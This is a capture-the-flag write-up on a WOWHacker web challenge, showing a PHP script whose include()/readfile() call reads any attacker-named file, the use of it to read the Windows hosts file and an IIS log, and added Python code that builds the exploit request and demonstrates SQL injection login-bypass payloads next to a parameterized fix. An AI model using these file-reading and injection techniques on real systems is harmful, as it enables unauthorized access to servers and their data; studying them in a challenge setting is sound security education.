Web Hacking Challenge - WOWHacker CTF

This post is about challenge 8, which made gamma95 and me feel completely lost when it comes to web hacking.

Challenge 8 (not accessible at the moment) is the only web hacking challenge in WOWHacker's CTF. In hindsight it's not very difficult, but in fact it took us almost a full day to solve it.

This is a classic PHP local file inclusion (LFI) attack. If you set the GET parameter ty and the cookie 71860c77c6745379b0d44304d66b6a13 to the same file name, the vulnerable PHP script in challenge 8 will try to include that file. Here's what the code looks like:
<?php
// The attacker controls both values, so the "check" only requires them to be equal.
$ty = $_GET["ty"];
$page = $_COOKIE["71860c77c6745379b0d44304d66b6a13"];
if ($ty != $page)
{
    echo "Error!";
}
else
{
    // include() runs on the attacker-supplied path either way;
    // only the message depends on what the included file returns.
    if (include($ty) != 'OK')
    {
        echo "Can't find that page!";
    }
}


Update: gamma95 has just pointed out to me that this challenge may not be a PHP local file inclusion attack at all. Maybe it's just a vulnerable readfile() call like this:
<?php
// Same equality "check" as above: both values come from the attacker.
$ty = $_GET["ty"];
$page = $_COOKIE["71860c77c6745379b0d44304d66b6a13"];
if ($ty != $page)
{
    echo "Error!";
}
else
{
    // file_exists() accepts absolute paths, so any file the web server
    // process can read is sent straight back to the client.
    if (file_exists($ty))
    {
        readfile($ty);
    }
    else
    {
        echo "Can't find that page!";
    }
}
For vulnerable scripts like this, the trick is to read files at known locations which may contain useful information, e.g. Apache httpd's error_log or access_log. Since we knew this was a Windows machine, we tested our theory by reading C:\Windows\system32\drivers\etc\hosts, which worked as expected. At this point we thought we were just moments away from solving the challenge, but in fact we were completely stuck for the next several hours.

We went on to guess the location of Apache httpd's log files. We sent hundreds of requests, but none worked. I even downloaded and installed a copy of Apache httpd to understand its directory structure, but still no luck. Why didn't it work?

Like challenge 1, it wasn't until we had almost given up on this challenge that we realized a simple fact: we had assumed all along that the web server was Apache httpd, while it was actually IIS! Years of abandoning Windows have brainwashed us. What a shame!

The next steps are simple. A default IIS installation stores its log files in C:\WINDOWS\system32\LogFiles\W3SVC1\exYYMMDD.log (W3SVC1 is the directory for the first web site; by default IIS names the daily file by UTC date, which is worth keeping in mind when guessing). As the preliminary round started on 2009.08.14, we guessed we should include C:\WINDOWS\system32\LogFiles\W3SVC1\ex090814.log. Since IIS logs the URI of every request it serves, that file in turn revealed this secret script:
/tmxhffjsqkdlxmwhaWkddlsemt/answpsorltlagkrpglaemfdjttmqslek/rmfoehrufrnrdpsvntutspdy.php
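The whole procedure above (the equal ty/cookie trick from the vulnerable script, the default IIS log file for the challenge date, and pulling the unexpected URI out of the leaked W3C extended log), written up as an added Python example. This is not code from the original write-up or from the CTF: the parameter name, cookie name and ex090814.log path come from the post, while BASE_URL is a hypothetical location for the challenge script and SAMPLE_LOG is a constructed log in IIS 6's default field layout.

```python
"""Added example, not code from the original write-up or the CTF.

Models the three steps above: pick the default IIS log file for the
challenge date, build the request that satisfies the ty == cookie check,
and pull unexpected URIs out of the leaked W3C extended log.
Assumptions not stated on the page: BASE_URL is hypothetical, the log
uses IIS 6's default W3C field set, and SAMPLE_LOG is constructed.
"""
import datetime
import urllib.parse
import urllib.request

PARAM_NAME = "ty"                                   # from the write-up
COOKIE_NAME = "71860c77c6745379b0d44304d66b6a13"    # from the write-up
BASE_URL = "http://challenge.example/8/index.php"   # hypothetical

# URI stems every IIS site logs constantly; tune this to the target.
NOISE_PATHS = {"/", "/index.php", "/favicon.ico", "/robots.txt"}


def iis_log_path(day, site_id=1):
    """Default IIS 6 W3C log file for a day ('YYYY-MM-DD' or datetime.date):
    C:\\WINDOWS\\system32\\LogFiles\\W3SVC<site_id>\\exYYMMDD.log.
    IIS names these files by UTC date unless local-time naming is enabled,
    so a request made late in the local evening may land in the next file."""
    if isinstance(day, str):
        day = datetime.date.fromisoformat(day)
    return r"C:\WINDOWS\system32\LogFiles\W3SVC%d\ex%s.log" % (site_id, day.strftime("%y%m%d"))


def build_request(path):
    """Request that passes the script's check: the GET parameter and the
    cookie must carry the identical file name, or the script prints Error!."""
    url = BASE_URL + "?" + urllib.parse.urlencode({PARAM_NAME: path})
    return urllib.request.Request(url, headers={"Cookie": "%s=%s" % (COOKIE_NAME, path)})


def read_remote_file(path, timeout=10.0):
    """Fetch the leaked file body. Network call; not exercised offline."""
    with urllib.request.urlopen(build_request(path), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def parse_iis_log(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names.
    Column names come from the #Fields directive rather than hardcoded
    indices, because the logged field set is configurable per site."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("log entry before #Fields directive")
        values = line.split()          # IIS replaces spaces inside a value with '+'
        if len(values) != len(fields):
            continue                   # truncated entry: skip rather than misalign columns
        rows.append(dict(zip(fields, values)))
    return rows


def hidden_paths(text):
    """Distinct cs-uri-stem values that are not obvious noise, in first-seen order."""
    found = []
    for row in parse_iis_log(text):
        stem = row.get("cs-uri-stem", "")
        if stem and stem not in NOISE_PATHS and stem not in found:
            found.append(stem)
    return found


# Constructed sample in IIS 6's default W3C format (not a real log).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-08-14 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-08-14 00:01:12 192.0.2.10 GET / - 80 - 198.51.100.7 Mozilla/5.0+(Windows) 200 0 0
2009-08-14 00:01:13 192.0.2.10 GET /favicon.ico - 80 - 198.51.100.7 Mozilla/5.0+(Windows) 404 0 2
2009-08-14 00:05:40 192.0.2.10 GET /tmxhffjsqkdlxmwhaWkddlsemt/answpsorltlagkrpglaemfdjttmqslek/rmfoehrufrnrdpsvntutspdy.php - 80 - 198.51.100.7 Mozilla/5.0+(Windows) 200 0 0
2009-08-14 00:06:02 192.0.2.10 GET /index.php ty=C:\Windows\system32\drivers\etc\hosts 80 - 203.0.113.5 Mozilla/5.0+(X11) 200 0 0
"""

if __name__ == "__main__":
    log = iis_log_path("2009-08-14")
    print("would request:", build_request(log).full_url)
    for stem in hidden_paths(SAMPLE_LOG):
        print("candidate hidden script:", stem)
```

Parsing the #Fields directive instead of hardcoding column positions is the part worth keeping: the same code works on a log where the administrator has added or removed fields, and skipping rows whose column count does not match the header avoids silently reading a query string as a URI stem when the last line of the file is truncated mid-write.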
This script asks for a username and password, which gamma95 bypassed with a trivial SQL injection attack even before I had figured out what to do next. After bypassing the authentication, we obtained the flag: Do you know StolenByte???
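What a "trivial SQL injection" login bypass of this kind looks like, as an added Python example that is not from the original write-up. The challenge's actual login query is not on the page, so the schema, the constructed 'admin' row and both login functions are assumptions for illustration; the vulnerable form builds the WHERE clause by string formatting, the fixed form binds parameters.

```python
"""Added example, not from the original write-up: a string-built login
query that a quote in the input can rewrite, beside the parameterized fix.
The challenge's real query is unknown; this schema, the 'admin' row and the
login functions are constructed for illustration.
"""
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string formatting, so a quote in the input
    becomes SQL syntax. Returns True when at least one row matches."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, username, password):
    """Same query with bound parameters: the input stays data, never syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Classic payloads: comment out the password check, or turn the predicate into a tautology.
BYPASS_COMMENT = ("admin' --", "anything")
BYPASS_TAUTOLOGY = ("' OR '1'='1", "' OR '1'='1")

if __name__ == "__main__":
    db = make_db()
    for user, pw in (BYPASS_COMMENT, BYPASS_TAUTOLOGY):
        print(repr(user), "vulnerable:", login_vulnerable(db, user, pw),
              "fixed:", login_fixed(db, user, pw))
```

With the comment payload the vulnerable query collapses to `WHERE username = 'admin'`, and with the tautology payload AND binds tighter than OR, so the trailing `OR '1'='1'` makes the whole predicate true. The parameterized version returns False for both because the quotes are compared as characters in the column, not parsed as SQL.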

No we don't know him, but thanks for a nice challenge!
